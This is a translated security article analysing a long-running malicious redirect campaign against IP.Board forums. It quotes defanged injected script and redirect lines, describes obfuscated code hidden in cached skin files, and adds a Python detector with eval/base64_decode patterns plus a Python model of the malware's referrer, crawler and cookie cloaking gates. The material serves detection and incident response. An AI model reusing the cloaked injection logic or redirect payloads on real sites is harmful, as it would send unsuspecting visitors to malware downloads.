IP.Board CMS malicious redirect analysis - vulnerability warning - 黑吧安全网 (myhack58.com)

ID MYHACK58:62201559176
Type myhack58
Reporter Anonymous (佚名)
Modified 2015-02-17T00:00:00


IP.Board is a well-known CMS that lets users easily create and manage online communities. Sucuri researchers recently discovered a malicious redirect targeting IP.Board installations, and their analysis showed that the campaign has been running for two years.


Visitors are maliciously redirected

The redirect symptoms are typical: some visitors who arrive from a Google search are sent to a malicious site, filestore321 . com/download.php?id=<hex-number>. Each visitor is redirected only once; later visits and clicks are not redirected.

We captured the HTTP traffic and found that the page loaded a script from "hxxp://forum . hackedsite . com/index.php?ipbv=4458734cb50e112ba7dd3a154b22ecd9&g=js". The script's content was:

document.location='hxxp://filestore321 . com/download.php?id=<8-digit-hex-number>'

How it works

How does IP.Board end up running this redirect? Because IP.Board is far less documented than WordPress, tracking down the source took a lot of effort. We eventually came across an article Peter Upfold wrote two years ago. It explained how the redirect works and showed that this technique had already appeared two years earlier and has not changed much since.

You do not need to read Peter Upfold's article; I will explain how the malware works and how it behaves.

IP.Board stores skins both in the database and on disk as files. When a skin is cached, it lives under ./cache/skin_cache/cacheid_n, where n is the skin ID. The affected file we found was skin_global.php under ./cache/skin_cache/cacheid_4.


Line 6 (highlighted in the original screenshot) is where we found the malicious code in this 120 KB skin file.

The three obfuscated code blobs are assigned to variables named $rsa, $pka and $pkb, so that a casual reader mistakes them for security keys.
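The file location and the camouflage variable names above are enough to write a first-pass check for infected skin caches. The following scanner is an added example, not Sucuri's or the author's code: it walks the ./cache/skin_cache/cacheid_*/ layout described above, flags lines that combine the $rsa/$pka/$pkb names with long base64-like literals and a decode/eval call, and refuses to flag a file on a single indicator alone, because legitimate cached skins do contain long strings (inline CSS, data URIs). The long-literal threshold, the decode-function list and the sample files are assumptions constructed for this example.

```python
import re
from pathlib import Path

# Indicators used by this example. The variable names come from the write-up
# ($rsa, $pka, $pkb were used as camouflage); the long-literal and decode/eval
# patterns are generic obfuscation markers added here as assumptions, not a
# published signature.
SUSPICIOUS_VARS = re.compile(r"\$(?:rsa|pka|pkb)\b")
LONG_LITERAL = re.compile(r"['\"][A-Za-z0-9+/=]{200,}['\"]")
DECODE_EXEC = re.compile(
    r"\b(?:base64_decode|gzinflate|gzuncompress|str_rot13|eval)\s*\(",
    re.IGNORECASE,
)


def scan_skin_file(text):
    """Return [(line_no, tag), ...] for every indicator hit in one cached skin file."""
    findings = []
    for line_no, line in enumerate(text.splitlines(), start=1):
        if SUSPICIOUS_VARS.search(line):
            findings.append((line_no, "suspicious_var"))
        if LONG_LITERAL.search(line):
            findings.append((line_no, "long_literal"))
        if DECODE_EXEC.search(line):
            findings.append((line_no, "decode_exec"))
    return findings


def is_suspicious(findings):
    """Flag a file only when two or more different indicators hit the same line.

    A lone long literal or a lone base64_decode() is common in real skin
    caches; their co-occurrence on one line is what marks the injected code.
    """
    tags_by_line = {}
    for line_no, tag in findings:
        tags_by_line.setdefault(line_no, set()).add(tag)
    return any(len(tags) >= 2 for tags in tags_by_line.values())


def scan_skin_cache(root):
    """Walk <root>/cacheid_*/*.php (the ./cache/skin_cache layout) and return flagged files."""
    flagged = {}
    for path in sorted(Path(root).glob("cacheid_*/*.php")):
        findings = scan_skin_file(path.read_text(encoding="utf-8", errors="replace"))
        if is_suspicious(findings):
            flagged[str(path)] = findings
    return flagged


# Constructed stand-ins for a cached skin file (not real IP.Board code). In the
# infected sample the injected code sits on line 6, mirroring the write-up.
CLEAN_SAMPLE = (
    "<?php\n"
    "// constructed stand-in for a cached skin file\n"
    "if (!defined('IN_IPB')) { exit(); }\n"
    "$this->output .= '<div class=\"header\">';\n"
    "$this->output .= '</div>';\n"
)
INFECTED_SAMPLE = (
    "<?php\n"
    "// constructed stand-in for a cached skin file\n"
    "if (!defined('IN_IPB')) { exit(); }\n"
    "$this->output .= '<div class=\"header\">';\n"
    "\n"
    "$rsa='" + "QUFB" * 60 + "'; $pka='Zm9v'; $pkb='YmFy'; "
    "eval(base64_decode($rsa.$pka.$pkb));\n"
    "$this->output .= '</div>';\n"
)

if __name__ == "__main__":
    for name, sample in (("clean", CLEAN_SAMPLE), ("infected", INFECTED_SAMPLE)):
        hits = scan_skin_file(sample)
        print(name, "suspicious" if is_suspicious(hits) else "ok", hits)
```

Run scan_skin_cache("./cache/skin_cache") from the forum root to check a live installation; anything it flags should be diffed against the skin stored in the database, since the cached copy is what actually executes.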

After de-obfuscating the code (shown as a screenshot in the original), its logic is as follows.


First, it checks whether the visitor arrived from a search engine or a social network link, and that the visitor is not a crawler. If this is the visitor's first visit (no lang_id cookie is present), it injects a script into the page:

<script type='text/javascript' src='hxxp://hackedsite . com/index.php?ipbv=<some-hash>&g=js'>
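The three gates described above (referrer, crawler check, first-visit cookie) explain why the redirect is so hard to reproduce by hand: a direct visit, a crawler user-agent or a returning browser all get a clean page. The model below is an added example, not the malware's code or Sucuri's: it applies the same three checks to one request and injects the loader tag only when all pass. The referrer and crawler lists, the injection position (before </body>), and the decision to set lang_id after the first injected response so the "only once" behaviour holds are assumptions; the page does not publish the malware's lists or say who sets the cookie.

```python
from urllib.parse import urlparse

# Assumed lists for this model; the write-up says the code checks for search
# engine / social referrers and excludes crawlers but does not publish them.
REFERRER_MARKERS = ("google.", "bing.", "yahoo.", "facebook.", "twitter.")
CRAWLER_MARKERS = ("googlebot", "bingbot", "slurp", "yandex", "baiduspider")
FIRST_VISIT_COOKIE = "lang_id"  # cookie named in the write-up

# Defanged loader URL as quoted in the write-up; the ipbv hash is left as a placeholder.
LOADER_URL = "hxxp://hackedsite . com/index.php?ipbv=<some-hash>&g=js"

# Constructed page body, not real forum output.
SAMPLE_PAGE = "<html><body><h1>Forum</h1></body></html>"


def from_search_or_social(referer):
    """Gate 1: Referer host looks like a search engine or social network."""
    if not referer:
        return False
    host = (urlparse(referer).hostname or "").lower()
    return any(marker in host for marker in REFERRER_MARKERS)


def is_crawler(user_agent):
    """Gate 2: crawlers never see the injection, so search engines index a clean page."""
    ua = (user_agent or "").lower()
    return any(marker in ua for marker in CRAWLER_MARKERS)


def should_inject(referer, user_agent, cookies):
    """All three gates in the order the analysis describes."""
    return (
        from_search_or_social(referer)
        and not is_crawler(user_agent)
        and FIRST_VISIT_COOKIE not in cookies
    )


def build_response(html, referer, user_agent, cookies, loader_url=LOADER_URL):
    """Return (body, set_cookie) for one request against the infected skin.

    set_cookie is None when nothing was injected. Injecting before </body> and
    setting lang_id here are assumptions made for the model.
    """
    if not should_inject(referer, user_agent, cookies):
        return html, None
    tag = "<script type='text/javascript' src='%s'></script>" % loader_url
    if "</body>" in html:
        body = html.replace("</body>", tag + "</body>", 1)
    else:
        body = html + tag
    return body, (FIRST_VISIT_COOKIE, "1")


if __name__ == "__main__":
    browser = "Mozilla/5.0 (Windows NT 6.1; rv:35.0) Gecko/20100101 Firefox/35.0"
    jar = {}
    # First visit from a Google result: injected.
    body, cookie = build_response(SAMPLE_PAGE, "https://www.google.com/search?q=forum", browser, jar)
    print("first visit injected:", "<script" in body)
    if cookie:
        jar[cookie[0]] = cookie[1]
    # Same visitor again: clean.
    body, _ = build_response(SAMPLE_PAGE, "https://www.google.com/search?q=forum", browser, jar)
    print("second visit injected:", "<script" in body)
```

For an investigator this means reproducing the redirect needs a request with a search-engine Referer, a browser User-Agent and an empty cookie jar (for example curl with -H 'Referer: https://www.google.com/' and no -b cookie file); repeating the request with the cookies from the first response will look clean, which is exactly what makes the infection easy to miss.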
